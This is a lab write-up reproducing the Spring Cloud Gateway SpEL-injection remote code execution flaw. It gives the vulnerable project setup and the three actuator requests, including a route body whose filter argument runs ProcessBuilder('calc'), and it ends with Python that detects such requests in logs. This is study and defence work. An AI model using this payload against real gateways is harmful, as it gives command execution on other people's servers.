Reproducing the Spring Cloud Gateway remote code execution vulnerability
First, what is Spring Cloud Gateway? Spring Cloud Gateway is a library for building an API gateway on top of Spring WebFlux. It aims to provide a simple yet effective way to route to APIs and to supply cross-cutting concerns for them, such as security, monitoring and resilience.
Spring Cloud Gateway features:
- Built on Spring Framework 5, Project Reactor and Spring Boot 2.0.
- Routes can match on any request attribute.
- Predicates and filters are specific to routes.
- Circuit Breaker integration.
- Spring Cloud DiscoveryClient integration.
- Predicates and filters are easy to write.
- Request rate limiting.
- Path rewriting.
Setting up the vulnerable environment
The versions used in this test are exactly the ones the official advisory lists as affected; apart from these you also need the Postman tool:
- Spring Boot 2.5.2
- Spring Cloud 2020.0.3
- Spring Cloud Gateway 3.0.3 (the vulnerable version)
Create a Maven project in IDEA (mine is called gateWay-poc); the pom.xml is below:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.5.2</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>
    <groupId>com.example</groupId>
    <artifactId>gateway-poc</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <name>gateway-poc</name>
    <description>gateway-poc</description>
    <properties>
        <java.version>1.8</java.version>
        <spring-cloud.version>2020.0.5</spring-cloud.version>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.springframework.cloud</groupId>
            <artifactId>spring-cloud-starter-gateway</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-actuator</artifactId>
        </dependency>
    </dependencies>
    <dependencyManagement>
        <dependencies>
            <dependency>
                <groupId>org.springframework.cloud</groupId>
                <artifactId>spring-cloud-dependencies</artifactId>
                <version>2020.0.3</version>
                <type>pom</type>
                <scope>import</scope>
            </dependency>
        </dependencies>
    </dependencyManagement>
    <build>
        <finalName>gateway</finalName>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-compiler-plugin</artifactId>
                <configuration>
                    <source>1.8</source>
                    <target>1.8</target>
                </configuration>
            </plugin>
        </plugins>
    </build>
</project>
```
Then create application.yml. Note that it exposes the `gateway` actuator endpoint over HTTP, which is what the reproduction below talks to:
```yaml
server:
  port: 8080
management:
  endpoints:
    web:
      exposure:
        include: gateway
  endpoint:
    gateway:
      enabled: true
spring:
  cloud:
    gateway:
      routes:
        - id: baidu
          uri: 'https://www.baidu.com/'
          order: 8000
          predicates:
            - Path=/skip/baidu
          filters:
            - StripPrefix=2
```
Write the startup class GatewayPocApplication:
```java
package com.example.gatewaypoc;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;

@SpringBootApplication
public class GatewayPocApplication {
    public static void main(String[] args) {
        SpringApplication.run(GatewayPocApplication.class, args);
    }
}
```
Start the Maven project.
The reproduction process is as follows.
1. List the current routes:
GET http://localhost:8080/actuator/gateway/routes
2. Add a route whose filter argument contains the injected expression:
POST http://localhost:8080/actuator/gateway/routes/test
Content-Type: application/json
Request body:
```json
{
  "id": "test",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new java.lang.ProcessBuilder(\"calc\").start()}"
    }
  }],
  "uri": "https://www.baidu.com"
}
```
3. Refresh the gateway routes:
POST http://localhost:8080/actuator/gateway/refresh
Send the requests above from Postman; the local calculator program opens immediately, which shows the injected code was executed.
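From the defender's side, the sequence above leaves a clear trace: a POST that writes a route whose filter or predicate `args` hold a SpEL template (`#{...}`), followed by a POST to the refresh endpoint that puts it into service. The following Python is an added example (not the author's code and not part of Spring Cloud Gateway) that scans access records for exactly that pattern; the JSON-lines log format, its field names and the sample records are assumptions constructed here.

```python
import json
import re

ROUTE_WRITE = re.compile(r"^/actuator/gateway/routes/([^/]+)$")  # captures the route id
SPEL_TEMPLATE = re.compile(r"#\{.*?\}", re.S)  # SpEL template marker inside an arg value

def spel_args(route):
    """Return (name, value) pairs of filter/predicate args that carry '#{...}'."""
    hits = []
    for section in ("filters", "predicates"):
        for item in route.get(section, []):
            for value in item.get("args", {}).values():
                if isinstance(value, str) and SPEL_TEMPLATE.search(value):
                    hits.append((item.get("name", "?"), value))
    return hits

def scan_log(text):
    """Walk JSON-lines access records; flag route writes whose body carries SpEL
    and refresh calls, which are what put a written route into service."""
    findings = []
    for line in filter(str.strip, text.splitlines()):
        rec = json.loads(line)
        if rec.get("method") != "POST":
            continue
        if rec.get("path") == "/actuator/gateway/refresh":
            findings.append({"kind": "refresh", "route_id": None, "hits": []})
            continue
        m = ROUTE_WRITE.match(rec.get("path", ""))
        if not m:
            continue
        try:
            route = json.loads(rec.get("body") or "{}")
        except json.JSONDecodeError:
            continue  # body is not a route definition; nothing to inspect
        hits = spel_args(route)
        if hits:
            findings.append({"kind": "spel_route", "route_id": m.group(1), "hits": hits})
    return findings

# Constructed sample records (the write-up's requests plus one benign write); log format assumed.
EVIL_ROUTE = {"id": "test", "uri": "https://www.baidu.com", "filters": [{"name": "AddResponseHeader",
              "args": {"name": "Result", "value": '#{new java.lang.ProcessBuilder("calc").start()}'}}]}
OK_ROUTE = {"id": "ok", "uri": "https://example.org", "filters": [{"name": "AddResponseHeader",
            "args": {"name": "X-Env", "value": "prod"}}]}
SAMPLE_LOG = "\n".join(json.dumps(r) for r in [
    {"method": "POST", "path": "/actuator/gateway/routes/test", "body": json.dumps(EVIL_ROUTE)},
    {"method": "POST", "path": "/actuator/gateway/routes/ok", "body": json.dumps(OK_ROUTE)},
    {"method": "POST", "path": "/actuator/gateway/refresh", "body": ""},
])
```

Running `scan_log(SAMPLE_LOG)` reports the `test` route write with its SpEL argument and the subsequent refresh, while the benign `ok` route produces nothing.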